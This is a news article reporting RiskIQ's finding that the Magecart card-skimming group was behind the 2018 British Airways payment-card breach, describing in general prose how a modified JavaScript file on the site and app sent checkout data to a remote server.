British Airways breach caused by the same group that hit Ticketmaster

Security researchers find clues connecting the Magecart group to the breach at British Airways.
Written by Catalin Cimpanu, Contributor

A cyber-criminal operation known as Magecart is believed to have been behind the recent card breach announced last week by British Airways.

The operation has been active since 2015 when RiskIQ and ClearSky researchers spotted the malware for the first time.

The group's regular mode of operation involves hacking into online stores and hiding JavaScript code that steals payment card information entered into store checkout pages, information such as credit card numbers, names, addresses, and whatever is collected via payment forms.

The group has been very active in the past three years, being blamed for injecting card skimming scripts on thousands of sites, with the most recent trove of compromised sites being discovered two weeks ago.

Of all its hacks, the most notorious incident was when the group compromised a third-party chat provider and used its infrastructure to drop malicious scripts on the Ticketmaster checkout page.

Also: Tech support scammers find a home on Microsoft TechNet pages

But in a report published today, researchers at RiskIQ say they found clues linking the same Magecart operation to the British Airways breach.

This breach was announced last week when British Airways said that an unidentified hacker compromised its systems and stole the card details of over 380,000 users.

The UK airline did not provide in-depth technical details but only revealed that the attacker collected information on payments made through its main website at ba.com, and from its mobile app, between 22:58 GMT August 21, 2018, and 21:45 GMT September 5, 2018.

Also: US government releases post-mortem report on Equifax hack

But RiskIQ experts say the time period that British Airways provided in its official statement became an essential clue for its investigation.

Experts said they immediately went to an internal tool that archives the source code of internet sites across time. They used this tool to see how JavaScript code loaded on the British Airways site changed at the time of the hack.

Researchers say they found that a file that had previously not been modified since 2012 was changed on August 21, 2018, at 20:49 GMT, two hours before the date provided in the British Airways press release.

Also: 7 tips for SMBs to improve data security TechRepublic

RiskIQ says the Magecart group added a malicious piece of code at the end of a previously clean file named modernizr-2.6.2.js.

This piece of code monitored for certain mouse-up and touch-up interactions, extracted any data entered in the checkout page payment form, and sent it to a remote server located in Romania (actually owned by a Lithuanian virtual private server [VPS] provider).

This server was also using a Comodo certificate registered days before the hack, on August 15. According to RiskIQ, this certificate reveals the attackers had time to prepare the hack days before it began, which also means they most likely had access to the British Airways website infrastructure by that time as well.

Also: New Silence hacking group suspected of having ties to cyber-security industry

Furthermore, RiskIQ experts also said they solved the mystery of why the compromise took place on both the main British Airways website and the mobile app at the same time.

Credit card skimming scripts usually affect only websites, mainly because mobile apps are managed from a different codebase. But according to RiskIQ, British Airways devs opted to load the website's payment interface inside the mobile app, meaning that the official app also loaded the malicious card skimmer script as well, hence the reason why payments from the mobile app were also recorded.

With the Magecart operation growing in size each year, it is becoming increasingly dangerous to pay for goods online, even on larger platforms owned by companies that should, at least in theory, afford to secure their websites from compromise.

These are 2018's biggest hacks, leaks, and data breaches

Previous and related coverage:

What is malware? Everything you need to know

Cyber attacks and malware are one of the biggest threats on the internet. Learn about the different types of malware - and how to avoid falling victim to attacks.

Security 101: Here's how to keep your data private, step by step

This simple advice will help to protect you against hackers and government surveillance.

VPN services 2018: The ultimate guide to protecting your data on the internet

Whether you're in the office or on the road, a VPN is still one of the best ways to protect yourself on the big, bad internet.

Editorial standards